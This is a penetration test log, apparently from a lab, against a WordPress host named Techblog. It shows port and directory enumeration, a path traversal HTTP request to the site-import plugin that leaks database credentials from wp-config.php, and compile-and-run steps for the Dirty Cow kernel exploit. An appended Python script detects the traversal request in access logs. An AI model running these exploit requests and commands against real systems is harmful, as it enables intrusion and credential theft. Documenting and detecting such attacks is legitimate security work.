Techblog

Pentest Log: 2025-08-24

Target Information

ip=10.11.1.3

Enumeration

Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 80

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

The post says the website has siteimport installed. Googling "siteimport exploit" found:

https://www.exploit-db.com/exploits/39558

Exploitation

Vulnerability Summary

Exploit Execution

Exploit Method

Tool / Script Used:

GET /wp-content/plugins/site-import/admin/page.php?url=../../../../../../../var/www/html/wp-config.php HTTP/1.1
Host: 10.11.1.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: wfvt_2535711778=68ab71719866a; wordfence_verifiedHuman=5024043dda1f120635b13b607050c4af; wordpress_test_cookie=WP+Cookie+check; wfvt_3269544153=68ab6c2cba2b7
Upgrade-Insecure-Requests: 1
Priority: u=0, i



/** MySQL database username */
define('DB_USER', 'techblog');

/** MySQL database password */
define('DB_PASSWORD', 'z8n#DZf@Sa#X!4@tqG');

Found credentials:

techblog:z8n#DZf@Sa#X!4@tqG
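
Added example (not part of the original log or of the plugin): a detection check that scans web access logs for the file-inclusion request shown above, including percent-encoded and double-encoded variants. It assumes Combined Log Format and that a legitimate url value is an http(s) address; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint taken from the request in this log.
PLUGIN_PATH = "/wp-content/plugins/site-import/admin/page.php"
# Combined Log Format (assumed): ip - user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so %252e%252e%252f is seen as ../"""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_suspicious_url_param(value):
    """True if the url parameter references a local path (assumption: real use is http/https)."""
    v = fully_decode(value).replace("\\", "/").lower()
    return "../" in v or v.startswith(("/", "file:"))

def scan(lines):
    """Return (client_ip, status, decoded_url_param) for each flagged request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        client, target, status = m.groups()
        parts = urlsplit(target)
        if fully_decode(parts.path).lower() != PLUGIN_PATH:
            continue  # only the plugin endpoint from this log is checked
        for value in parse_qs(parts.query).get("url", []):
            if is_suspicious_url_param(value):
                hits.append((client, int(status), fully_decode(value)))
    return hits

# Constructed sample access-log lines (documentation IP range, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [24/Aug/2025:10:00:01 +0000] "GET /wp-content/plugins/site-import/admin/page.php?url=../../../../../../../var/www/html/wp-config.php HTTP/1.1" 200 3120 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [24/Aug/2025:10:00:05 +0000] "GET /wp-content/plugins/site-import/admin/page.php?url=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 210 "-" "curl/8.0"',
    '192.0.2.12 - - [24/Aug/2025:10:00:09 +0000] "GET /wp-content/plugins/site-import/admin/page.php?url=http://example.com/ HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '192.0.2.13 - - [24/Aug/2025:10:00:12 +0000] "GET /index.php?url=../x HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

A 200 status on a flagged request means the file contents were likely returned, so any secrets in that file (here the database credentials in wp-config.php) should be rotated.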

Privilege Escalation

Current Access

Enumeration

System Info:

uname -a

Found kernel version:

3.10.0-123.el7.x86_64

Googled for a kernel exploit and found:

Dirty Cow
https://www.exploit-db.com/exploits/40839

Privilege Escalation Exploit

Exploit Summary

Exploit Steps

gcc -pthread 40839.c -o dirty -lcrypt -static
./dirty